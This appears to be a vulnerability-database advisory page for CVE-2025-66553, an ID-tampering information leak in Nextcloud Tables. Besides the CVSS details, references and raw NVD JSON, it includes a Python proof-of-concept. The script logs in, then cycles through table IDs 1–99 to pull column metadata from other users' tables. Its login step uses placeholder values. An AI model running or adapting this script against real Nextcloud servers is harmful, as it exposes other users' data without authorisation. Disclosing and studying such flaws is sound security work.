CVE-2025-66553

Description

Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.7 and 0.9.4, authenticated users were able to view meta data of columns in other tables of the Tables app by modifying the numeric ID in a request. This vulnerability is fixed in 0.8.7 and 0.9.4.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:* - VULNERABLE

Nextcloud Tables < 0.8.7

Nextcloud Tables < 0.9.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2025-66553 PoC - Nextcloud Tables Information Disclosure # Target: Nextcloud Tables < 0.8.7 and < 0.9.4 TARGET_URL = "https://vulnerable-nextcloud.example.com" USERNAME = "[email protected]" PASSWORD = "password123" def authenticate(): """Authenticate to Nextcloud and get session cookies""" session = requests.Session() login_url = f"{TARGET_URL}/login" # Get CSRF token response = session.get(login_url) csrf_token = session.cookies.get('nc_token') or 'your_csrf_token' # Login request login_data = { 'user': USERNAME, 'password': PASSWORD, 'requesttoken': csrf_token } response = session.post(login_url, data=login_data) if response.status_code == 200: return session return None def exploit_table_columns(session, table_id): """Attempt to retrieve column metadata from target table""" columns_url = f"{TARGET_URL}/apps/tables/api/1/tables/{table_id}/columns" headers = { 'OCS-APIREQUEST': 'true', 'Content-Type': 'application/json' } response = session.get(columns_url, headers=headers) if response.status_code == 200: try: data = response.json() if data and len(data) > 0: print(f"[!] Disclosed columns for table ID {table_id}:") for col in data: print(f" Column: {col.get('title')}, Type: {col.get('type')}") return data except json.JSONDecodeError: pass return None def main(): print("[*] CVE-2025-66553 PoC - Nextcloud Tables Information Disclosure") print("[*] Authenticating to Nextcloud...") session = authenticate() if not session: print("[-] Authentication failed") return print("[+] Authentication successful") print("[*] Enumerating table IDs to extract column metadata...") # Enumerate table IDs (typically sequential integers) for table_id in range(1, 100): columns = exploit_table_columns(session, table_id) if columns: print(f"[+] Successfully extracted metadata from table {table_id}") print("[*] PoC execution completed") if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66553
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66553
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66553/
[4] VulDB https://vuldb.com/cve/CVE-2025-66553
[5] https://github.com/nextcloud/security-advisories/security/advisories/GHSA-p53h-6294-crjw
[6] https://github.com/nextcloud/tables/commit/e975f5bfedb6922f04cdd236cde4e26067fe064e
[7] https://github.com/nextcloud/tables/pull/1891
[8] https://hackerone.com/reports/3138721

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66553", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.460", "lastModified": "2025-12-09T17:03:18.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.7 and 0.9.4, authenticated users were able to view meta data of columns in other tables of the Tables app by modifying the numeric ID in a request. This vulnerability is fixed in 0.8.7 and 0.9.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "0.8.0", "versionEndExcluding": "0.8.7", "matchCriteriaId": "8F6FEA34-55C6-4BE2-9B0A-A4A7B6A9AD2C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:tables:*:*:*:*:*:nextcloud:*:*", "versionStartIncluding": "0.9.0", "versionEndExcluding": "0.9.4", "matchCriteriaId": "8E73963A-16FC-4C82-90C9-E275535CEA5B"}]}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-p53h-6294-crjw", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/nextcloud/tables/commit/e975f5bfedb6922f04cdd236cde4e26067fe064e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/tables/pull/1891", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://hackerone.com/reports/3138721", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}